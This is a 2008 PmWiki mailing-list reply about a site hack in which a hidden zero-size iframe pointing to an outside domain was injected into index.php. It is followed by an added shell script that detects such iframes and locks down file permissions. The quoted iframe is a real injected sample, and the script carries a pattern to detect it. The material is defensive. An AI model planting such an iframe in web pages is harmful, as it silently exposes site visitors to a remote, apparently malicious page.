On Wed, Sep 3, 2008 at 2:50 PM, Erik Haagensen <[EMAIL PROTECTED]> wrote:
> The index.php (and several other files) contains this now:
>
> <?php include('pmwiki.php');
> <iframe src="http://mixlong.cn/in/"; width=0 height=0 frameborder=0></iframe>


I reported the same incident a few months ago. It happened on shared
hosting. The files were NOT writable by the web server, only by the
owner. My guess is that vulnerabilities in other scripts were being
exploited.

The fast solution is to make all files read-only except for the wiki.d
directory.

If the site is only edited by you occasionally, then that directory
can be read-only too. Just chmod the directory in your FTP client or
via SSH before editing, then set it back afterwards.

The other thing I did was move to a VPS where you don't have 100 other
users prowling around the same installation. Even if PmWiki is secure,
loopholes in other users' scripts and applications mean they could be
used to inject malicious data into PmWiki files, or any other files
which are writeable.


Marcus

_______________________________________________
pmwiki-users mailing list
[email protected]
http://www.pmichaud.com/mailman/listinfo/pmwiki-users
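
The lockdown described in the message above, as an added shell example that is not part of the original thread: it lists files carrying a zero-size iframe like the quoted one, lists files outside wiki.d that still have a write bit, and removes write permission everywhere except wiki.d. The function names, and the assumption that wiki.d sits directly under the wiki root, are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not from the thread). Assumed layout: <root>/wiki.d is the
# page store; everything else under <root> is code that should not change.

# Zero-size iframe pattern, matching width=0 / height="0" but not width=100.
IFRAME_RE="<iframe[^>]*(width|height)=[\"']?0([^0-9]|\$)"

# Print PHP/HTML files under the root that contain a zero-size iframe.
find_hidden_iframes() {
    local root=${1%/}
    grep -rIlEi --include='*.php' --include='*.html' "$IFRAME_RE" "$root" \
        2>/dev/null | sort
}

# Print regular files outside wiki.d that any user class can still write.
find_writable_outside_wikid() {
    local root=${1%/}
    find "$root" -path "$root/wiki.d" -prune -o -type f \
        \( -perm -200 -o -perm -020 -o -perm -002 \) -print | sort
}

# Remove write permission from all files and directories except wiki.d.
# Directories are included so files cannot be replaced by rename either.
lock_down() {
    local root=${1%/}
    find "$root" -path "$root/wiki.d" -prune -o \
        \( -type f -o -type d \) -exec chmod a-w {} +
}

# Stand-alone use: ./audit.sh /path/to/wiki [--lock]
if [ $# -gt 0 ]; then
    echo "Files with zero-size iframes:"
    find_hidden_iframes "$1"
    echo "Writable files outside wiki.d:"
    find_writable_outside_wikid "$1"
    if [ "${2:-}" = "--lock" ]; then
        lock_down "$1"
        echo "Write permission removed outside wiki.d."
    fi
fi
```

Files flagged by the first function were already modified, so restore them from a known-good copy before removing write permission; restore write permission temporarily (for example `chmod -R u+w`) when upgrading the wiki.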